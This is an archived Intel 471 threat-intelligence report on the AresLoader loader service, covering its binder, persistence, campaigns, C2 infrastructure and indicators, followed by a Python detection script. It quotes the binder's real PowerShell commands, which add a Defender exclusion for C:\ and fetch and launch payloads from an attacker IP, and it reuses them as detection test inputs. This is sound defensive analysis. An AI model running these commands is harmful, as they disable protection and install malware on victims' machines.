{
	"id": "bb96d929-6123-462e-a4e3-259a83e3ae7c",
	"created_at": "2026-04-06T01:31:02.290317Z",
	"updated_at": "2026-04-10T03:21:14.196845Z",
	"deleted_at": null,
	"sha1_hash": "7642a07d9ea2b3e38b3c8d613a5b4f308af6dd5a",
	"title": "New loader on the bloc - AresLoader",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 400994,
	"plain_text": "New loader on the bloc - AresLoader\r\nBy Intel 471\r\nPublished: 2026-04-01 · Archived: 2026-04-06 00:49:12 UTC\r\nAresLoader is a new loader malware-as-a-service (MaaS) offered by threat actors with links to Russian hacktivism that was spotted recently in the wild. Most users are pushing a variety of information stealers with the service. The service offers a “binder” tool that allows users to masquerade their malware as legitimate software.\r\nWe would like to acknowledge Roberto Martinez and Taisiia Garkava for alerting us to their in-the-wild observations of AresLoader and sharing those observations with us.\r\nThe actors behind the loader\r\nIn late November 2022, a threat actor using the handle AiD Lock aka DarkBLUP announced a new MaaS program called AresLoader on Telegram. The actor subsequently announced the service on the popular underground forums RAMP and XSS. The actor claimed the malware loader was written in the C programming language and allegedly is undetectable by Windows Defender antivirus software.\r\nPreviously our cyber intelligence team had associated AiD Lock with PHANTOM DEV aka Dead X Inject and the DeadXInject Hack group, which also offered the AiD Locker ransomware-as-a-service (RaaS) program.\r\nThe hacktivism - cybercrime crossover continues\r\nThe group we associated AiD Lock with, PHANTOM DEV, engaged in hacktivist activities in mid-2022 and claimed affiliation with the Red Hackers Alliance Russia aka RHA or RHA R, a pro-Russian hacktivist group.\r\nhttps://intel471.com/blog/new-loader-on-the-bloc-aresloader\r\nPage 1 of 7\n\nEvidence suggests multiple members of this group are either users or administrators of the AresLoader MaaS. This trend is not surprising and is something being seen more frequently from hacktivist groups, which usually focus on distributed denial-of-service (DDoS) attacks. However, the shift in the tactics, techniques and procedures (TTPs) of these groups to align more closely with cybercriminals, while supporting nation-state political objectives, continues to be observed more frequently.\r\n[Image: Figure 2 - Red Hackers Alliance Telegram channel April 15, 2022.]\r\nAresLoader - Malware-as-a-service breakdown\r\nThe AresLoader MaaS costs US $300 per month and includes five builds that allegedly are “packed manually.” The AresLoader panel offers an optional binder service in which a legitimate file is merged with the malicious loader.\r\n[Image: Figure 3 - The binder service upload page Dec. 27, 2022.]\r\nThe idea is that the malicious payload can masquerade as a legitimate file, often an installer for popular software. The binder works by writing a stub launcher that launches the original legitimate executable, then writes a batch (.bat) file to disk and executes that .bat file with “cmd.exe.”\r\n[Image: Figure 4 - The process tree of the binder payload, which depicts two execution paths — legitimate and malicious — March 13, 2023.]\r\nThe .bat file contains three PowerShell commands that perform three tasks:\r\n1. Add “C:\\” to the Windows Defender exclusion paths via:\r\nAdd-MpPreference -ExclusionPath ('C:\\\\')\r\n2. Fetch the malicious payload from a remote URL and launch it via:\r\nWGet (http[:]//5.75.248[.]207/emsabp32.dll) -OutfilE $EnV:AlLuSErSpRoFiLe\\\\emsabp32.dll; StARt-proCEss $EnV:aLluseRspROFiLE\\\\emsabp32.dll\r\nIn this case the payload was Raccoon Stealer, SHA-256 24de09bb454b0318af20ffcc21c6dd4ad5d6627cab7d7bfcb5c2278f63a2c3b7. In Windows PowerShell, WGet is a built-in alias of Invoke-WebRequest, and the random casing is cosmetic because command names are case-insensitive. Start-Process on a DLL does not run its code, which is why a third command follows.\r\n3. Fetch and launch a .bat file that uses rundll32.exe to execute the target payload, emsabp32.dll in this case:\r\nWget (http[:]//5.75.248[.]207/rundll32.bat) -oUtFIle $env:aLluSerSPROfIle\\\\rundll32.bat; sTArT-proCESS $EnV:aLluSErsPRoFILE\\\\rundll32.bat\r\nThe fetched .bat file contains: start rundll32.exe emsabp32.dll, _Start@1\r\nMalware behavior\r\nAresLoader has basic download and execute capabilities. Upon execution, it checks whether it is running as an administrator. If not, it attempts to escalate its privileges by relaunching itself through the ShellExecuteA application programming interface (API) with the “runas” verb, which raises a User Account Control (UAC) consent prompt rather than bypassing it.\r\n[Image: Figure 5 - A privilege escalation attempt observed March 13, 2023.]\r\nTo remain persistent, it creates a scheduled task and also adds a value under the “HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run” registry key.\r\n[Image: Figure 6 - The persistence mechanism: scheduled task observed March 13, 2023.]\r\n[Image: Figure 7 - The persistence mechanism: Run registry key observed March 13, 2023.]\r\nDistribution methods\r\nCampaign one — SystemBC, Amadey direct install\r\nIntel 471 first observed AresLoader in the wild Jan. 26, 2023. It was dropped by SystemBC (C2: 89.22.225[.]242) and later by the Amadey version 3.50 controller (C2: 85.209.135[.]109), both times fetched from the same drop location, http[:]//5.75.248[.]207/loader.exe.\r\n[Image: Figure 8 - The download and execute commands received by Intel 471 tracking systems captured March 13, 2023.]\r\nIn addition to the AresLoader sample, the Laplas clipper was installed from the same IP address that day. The threat actors first tried to install this payload directly, using the following infection chain:\r\nSystemBC received a download-and-execute command for a follow-up payload from the URL http[:]//5.75.248[.]207/avicapn32.exe\r\nThe Laplas clipper (Golang variant) sample downloaded from that URL has SHA-256 7cffcc27c8ab249e6e669274dd40d5ad138daa7f71548a5dfbb4b112db1053e2\r\nThey then shipped a second payload, a lightly obfuscated PowerShell script that downloads and executes the same Laplas sample, from the URL http[:]//5.75.248[.]207/cmpbksrvc32.cmd.\r\nThe threat actor made a feeble attempt to bypass security measures by installing the same payload via a different method.\r\nWe tracked this AresLoader customer by monitoring the behavior of the SystemBC and Amadey botnets they control. The actor operating the loader in this instance likes to drop information-stealer malware, primarily Laplas, on victim machines, followed by cryptocurrency miner payloads.\r\nCampaign two — Using the AresLoader binder service\r\nA similar campaign pushing AresLoader was discovered by malware researchers Roberto Martinez and Taisiia Garkava. In this case, several Raccoon Stealer samples were found dropping AresLoader. This AresLoader sample (40003d01db9c34da73a415792dba3a617fab65e91d2aae7bbbcd335af198a66b) dropped StealC and SystemBC payloads. The Raccoon Stealer payload was masquerading as an installer for a legitimate application called Revo Uninstaller Pro. The threat actor likely used the binder service available through the AresLoader control panel.\r\n[Image: Figure 9 - The legitimate software installer window that is launched in tandem with the malicious payload.]\r\nThe aforementioned .bat file that calls the payload with rundll32.exe sheds additional light on the use of the AresLoader binder feature. The VirusTotal intelligence platform shows parent payloads of the .bat file that all masquerade as common freeware.\r\n[Image: Figure 10 - Some malicious files found on VirusTotal that probably were created using the AresLoader binder service.]\r\nPayloads\r\nNot many instances of AresLoader have been discovered in the wild at present, but the loader MaaS does appear to have a few “customers.” Payloads Intel 471 and other researchers have observed thus far include:\r\nSystemBC – A back door and socket secure (SOCKS) proxy tunnel.\r\nLumma Stealer – A popular stealer MaaS.\r\nStealC – A new stealer MaaS that offers a configurable targeting system.\r\nAurora Stealer – A stealer MaaS written in the Golang programming language.\r\nLaplas clipper – A cryptocurrency clipper written in .NET and Golang.\r\nHosting\r\nThe AresLoader command and control (C2) infrastructure has been hosted at virtual private server (VPS) providers in Germany, the Netherlands, the United States and Russia.\r\nIP address | Country | ASN\r\n162.55.187[.]234 | DE | AS24940 Hetzner Online GmbH\r\n193.168.49[.]8 | RU | AS198610 Beget LLC\r\n37.220.87[.]62 | NL | AS204603 Partner LLC\r\n5.161.88[.]63 | US | AS213230 Hetzner Online GmbH\r\n5.75.240[.]155 | DE | AS24940 Hetzner Online GmbH\r\n62.217.180[.]55 | RU | AS198610 Beget LLC\r\n62.217.180[.]92 | RU | AS198610 Beget LLC\r\n62.217.181[.]4 | RU | AS198610 Beget LLC\r\nIntel 471 recommendations\r\nWe recommend defenders evaluate the following suggested measures for implementation in their environments:\r\nFlag scheduled tasks added via .bat or .cmd files.\r\nTurn on PowerShell logging. Script block logging (Event ID 4104) records the binder's commands as written, and their random casing and aliases normalize away trivially.\r\nFlag changes to the Defender exclusion list via “Add-MpPreference -ExclusionPath.” Defender itself also logs configuration changes (Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log), which catches the new exclusion even where PowerShell logging is off.\r\nEnforce evaluation of code signing for .exe files and MSI installers to detect tampering; an installer that has been through the binder no longer carries the original vendor's valid signature.\r\nMITRE ATT\u0026CK® techniques\r\nThis report uses the MITRE ATT\u0026CK® aka Adversarial Tactics, Techniques and Common Knowledge framework.\r\nTechnique title | ID | Use\r\nExecution [TA0002]\r\nCommand and scripting interpreter: PowerShell | T1059.001 | AresLoader uses a series of PowerShell scripts to load whichever malware it is loading for that campaign.\r\nUser execution: Malicious file | T1204.002 | AresLoader depends on victims executing the downloaded executable.\r\nPersistence [TA0003]\r\nScheduled task/job: Scheduled task | T1053.005 | AresLoader uses a scheduled task to gain persistence.\r\nBoot or logon autostart execution: Registry run keys / startup folder | T1547.001 | AresLoader adds a value under the HKCU Run key.\r\nPrivilege Escalation [TA0004]\r\nAbuse elevation control mechanism: Elevated execution with prompt | T1548.004 | AresLoader attempts to elevate privileges by executing itself with administrator privileges via ShellExecuteA and “runas.”\r\nDefense Evasion [TA0005]\r\nImpair defenses: Disable or modify tools | T1562.001 | AresLoader modifies Windows Defender by setting an exclusion.\r\nMasquerading: Match legitimate name or location | T1036.005 | AresLoader masquerades as a legitimate installer for multiple software utilities by using a binder to execute PowerShell commands.\r\nCommand and Control [TA0011]\r\nApplication layer protocol: Web protocols | T1071.001 | AresLoader uses HTTP/HTTPS to communicate with its C2.\r\nResource Development [TA0042]\r\nAcquire infrastructure: Virtual private server | T1583.003 | AresLoader MaaS operators rent VPSs to host the AresLoader control panel and malicious payloads.\r\nIndicators\r\nIndicator value | Indicator description\r\nhttp[:]//193[.]168[.]49[.]8 | AresLoader controller URL\r\nhttp[:]//62[.]217[.]181[.]4 | AresLoader controller URL\r\nhttp[:]//162[.]55[.]187[.]234 | AresLoader controller URL\r\nhttp[:]//37[.]220[.]87[.]62 | AresLoader controller URL\r\nhttp[:]//45[.]80[.]69[.]193 | AresLoader controller URL\r\nhttp[:]//5[.]161[.]88[.]63 | AresLoader controller URL\r\nhttp[:]//5[.]75[.]240[.]155 | AresLoader controller URL\r\nhttp[:]//62[.]217[.]180[.]55 | AresLoader controller URL\r\nhttp[:]//62[.]217[.]180[.]92 | AresLoader controller URL\r\n169c70fc77814578aa83b3a666eb674c49e60ac6964b040de9b1e51c5966bf56 | AresLoader sample\r\n40003d01db9c34da73a415792dba3a617fab65e91d2aae7bbbcd335af198a66b | AresLoader sample\r\n5c5829697e65e815e41670a142a90251297f8cff94282837c09443b9c1ebad26 | AresLoader sample\r\n7572b5b6b1f0ea8e857de568898cf97139c4e5237b835c61fea7d91a6f1155fb | AresLoader sample\r\n7f53135e532f1799d5c77727e47bf8f25a0c1381e9684c9c9fb2d2d0cd0ab2e4 | AresLoader sample\r\n812d4d9446b7962344e389b9498d08dabce1c9113bb18f554633da7e5992c4a3 | AresLoader sample\r\n839cef8414117e4181cb87b998e90fb3dad81463f8c219966cb59147e2d7c2cb | AresLoader sample\r\nb280e418cc13c8f1efe66c8c5f4b83e0a544ddbb9d0c460e24d279b93a22c5b3 | AresLoader sample\r\nbcec1f5dcdc03772d33bc63922603129c6eaf56358a7b5f4a4583c65766d71da | AresLoader sample\r\nf46b9aeafe296ebbad909e927fad26a21b05fbbc68cb446299c224fd27ea7fb0 | AresLoader sample\r\nhttp[:]//89[.]22[.]225[.]242[:]4193 | SystemBC controller address\r\nhttp[:]//85[.]209[.]135[.]109/jg94cVd30f/index.php | Amadey controller URL\r\nhttp[:]//5[.]75[.]248[.]207/loader[.]exe | AresLoader download URL\r\nhttp[:]//5[.]75[.]248[.]207/avicapn32[.]exe | Laplas download URL\r\nhttp[:]//5[.]75[.]248[.]207/cmpbksrvc32[.]cmd | PowerShell download URL\r\nSource: https://intel471.com/blog/new-loader-on-the-bloc-aresloader",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://intel471.com/blog/new-loader-on-the-bloc-aresloader"
	],
	"report_names": [
		"new-loader-on-the-bloc-aresloader"
	],
	"threat_actors": [],
	"ts_created_at": 1775439062,
	"ts_updated_at": 1775791274,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7642a07d9ea2b3e38b3c8d613a5b4f308af6dd5a.pdf",
		"text": "https://archive.orkl.eu/7642a07d9ea2b3e38b3c8d613a5b4f308af6dd5a.txt",
		"img": "https://archive.orkl.eu/7642a07d9ea2b3e38b3c8d613a5b4f308af6dd5a.jpg"
	}
}
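The binder batch file described in the report above (a Defender exclusion for C:\, a download into $env:ALLUSERSPROFILE followed by Start-Process, and a rundll32.exe export call) and the report's recommendations to turn on PowerShell logging and flag Add-MpPreference exclusions, shown as working detection logic. This is an added example, not code from Intel 471 or from the AresLoader operators: it runs three rules over constructed Script Block Logging (Event ID 4104) texts and one process command line modelled on the report's commands. The drop host 203.0.113.10 is a documentation address standing in for the real one, and the rule names, the ALIASES table and the SAMPLES inputs are this example's own assumptions.

```python
# Added example (not code from Intel 471 or the AresLoader operators): triage
# PowerShell Script Block Logging text (Event ID 4104) and process command lines
# for the binder chain the report describes. Sample inputs are constructed to
# mirror the report's three commands; 203.0.113.10 is a documentation address
# standing in for the real drop host, and all names here are this example's own.
import re

# Aliases the binder leans on. PowerShell resolves them case-insensitively, so
# lower-casing plus alias expansion defeats the random-case obfuscation.
ALIASES = {
    'wget': 'invoke-webrequest', 'curl': 'invoke-webrequest', 'iwr': 'invoke-webrequest',
    'start': 'start-process', 'saps': 'start-process', 'iex': 'invoke-expression',
}
# Locations a non-admin user can write to; the binder uses $env:ALLUSERSPROFILE.
DROP_DIRS = ('$env:allusersprofile', '$env:programdata', '$env:temp', '$env:tmp',
             '$env:appdata', '$env:localappdata', '$env:public',
             'c:\\programdata', 'c:\\users\\public')
EXCLUSION = re.compile(r"-exclusionpath\s*\(?\s*['\"]?([^'\")\s;,]+)")
OUTFILE = re.compile(r"-outfile\s*:?\s*['\"]?([^'\"\s;]+)")
LAUNCH = re.compile(r'^(?:start-process|invoke-expression|invoke-item|rundll32(?:\.exe)?|&)\s')
RUNDLL = re.compile(r'rundll32(?:\.exe)?\s+([^\s,]+)\s*,\s*(\S+)')


def normalize(script: str) -> str:
    """Canonical lowercase form: casing, backtick padding and aliases removed."""
    text = re.sub(r'\s+', ' ', script.lower().replace('`', ''))
    for alias, cmdlet in ALIASES.items():
        # (?![-.]) keeps 'start' from rewriting the cmdlet name 'start-process'.
        text = re.sub(r'\b' + re.escape(alias) + r'\b(?![-.])', cmdlet, text)
    return text.strip()


def analyze(script: str) -> list:
    """Return (rule, detail) findings for one script block or command line."""
    text = normalize(script)
    findings = []
    # Rule 1: Defender exclusions; a drive root (the report shows C:\) is the
    # loudest possible form of T1562.001.
    for path in EXCLUSION.findall(text):
        rule = 'defender_root_exclusion' if re.fullmatch(r'[a-z]:\\?', path) else 'defender_exclusion'
        findings.append((rule, path))
    # Rule 2: fetch into a writable directory, then launch the same file from
    # another statement of the block (Invoke-WebRequest ... ; Start-Process ...).
    statements = [s.strip() for s in text.split(';')]
    for i, stmt in enumerate(statements):
        for path in OUTFILE.findall(stmt):
            name = re.split(r'[\\/]', path)[-1]
            launched = any(LAUNCH.match(other) and name in other
                           for j, other in enumerate(statements) if j != i)
            if launched and any(path.startswith(d) for d in DROP_DIRS):
                findings.append(('download_then_execute', path))
    # Rule 3: rundll32 invoking a named export, as in the dropped rundll32.bat.
    for dll, export in RUNDLL.findall(text):
        findings.append(('rundll32_export_call', dll + ',' + export))
    return findings


def triage(events: dict) -> dict:
    """Map event name -> findings, keeping only events that fired a rule."""
    hits = {}
    for name, text in events.items():
        findings = analyze(text)
        if findings:
            hits[name] = findings
    return hits


# Constructed inputs modelled on the report's binder chain, plus two benign
# admin actions that the rules must not confuse with it.
SAMPLES = {
    'binder_step1': r"Add-MpPreference -ExclusionPath ('C:\')",
    'binder_step2': r"WGet (http://203.0.113.10/emsabp32.dll) -OutfilE $EnV:AlLuSErSpRoFiLe\emsabp32.dll; StARt-proCEss $EnV:aLluseRspROFiLE\emsabp32.dll",
    'binder_step3': r"Wget (http://203.0.113.10/rundll32.bat) -oUtFIle $env:aLluSerSPROfIle\rundll32.bat; sTArT-proCESS $EnV:aLluSErsPRoFILE\rundll32.bat",
    'dropped_bat': r"start rundll32.exe emsabp32.dll, _Start@1",
    'admin_benign': r"Add-MpPreference -ExclusionPath 'D:\Builds\agent-cache'",
    'fetch_benign': r"Invoke-WebRequest https://example.com/feed.json -OutFile $env:TEMP\feed.json",
}

if __name__ == '__main__':
    for name, findings in triage(SAMPLES).items():
        print(name, findings)
```

The benign samples matter as much as the malicious ones: a single exclusion for a build directory is logged at lower severity rather than as a root-drive exclusion, and a download into $env:TEMP with no launcher in the same block produces no finding, so the download rule keys on the fetch-then-execute pairing the binder relies on rather than on Invoke-WebRequest alone.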